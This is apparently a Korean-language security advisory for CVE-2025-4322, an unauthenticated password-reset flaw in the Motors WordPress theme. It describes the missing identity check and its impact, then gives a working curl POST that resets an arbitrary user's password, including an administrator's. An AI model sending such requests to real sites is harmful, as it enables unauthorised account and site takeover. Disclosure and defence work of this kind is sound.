
CVE-2025-4322 – 비밀번호 업데이트를 통한 인증되지 않은 권한 상승 "계정 탈취" 🔥
Motors WordPress 테마는 버전 5.6.67까지(포함) 모든 버전에서 계정 탈취를 통한 권한 상승에 취약합니다. 이는 테마가 사용자의 비밀번호를 업데이트하기 전에 사용자 신원을 제대로 검증하지 않기 때문입니다. 이로 인해 인증되지 않은 공격자가 관리자 계정을 포함한 임의 사용자의 비밀번호를 변경하고 이를 악용하여 해당 계정에 접근할 수 있게 됩니다.
CNA: Wordfence 기본 점수: 9.8 ⚫ 치명적 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
5.6.67 - 비밀번호 업데이트/계정 탈취를 통한 인증되지 않은 권한 상승5.6.67Motors WordPress 테마(버전 5.6.67까지 포함)는 비밀번호 재설정 기능에 치명적인 인증 결함이 있습니다.
엔드포인트를 통해 프런트엔드 비밀번호 업데이트 메커니즘을 제공하지만, 비밀번호 변경을 처리하기 전에 사용자 신원이나 권한을 제대로 검증하지 못합니다.
그 결과, 인증되지 않은 공격자가 user_id, 임의의 hash_check, 새 비밀번호(stm_new_password)를 제공하는 조작된 HTTP 요청을 전송하여 관리자를 포함한 모든 사용자의 비밀번호를 재설정할 수 있습니다.
악용될 경우, 공격자는 다음을 수행할 수 있습니다:
관리자 접근 권한 획득,
전체 사이트 장악,
영구적인 백도어 또는 악성 플러그인 배포.
curl "https://local.ization/loginregister/?user_id=2&hash_check=%C0" --data "stm_new_password=randomizer" -XPOST -v -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36'
이 보고서는 교육 및 공인된 보안 테스트 목적으로만 제공됩니다. 허가 없이 이 취약점을 악용하는 것은 법적, 윤리적 경계를 위반할 수 있습니다.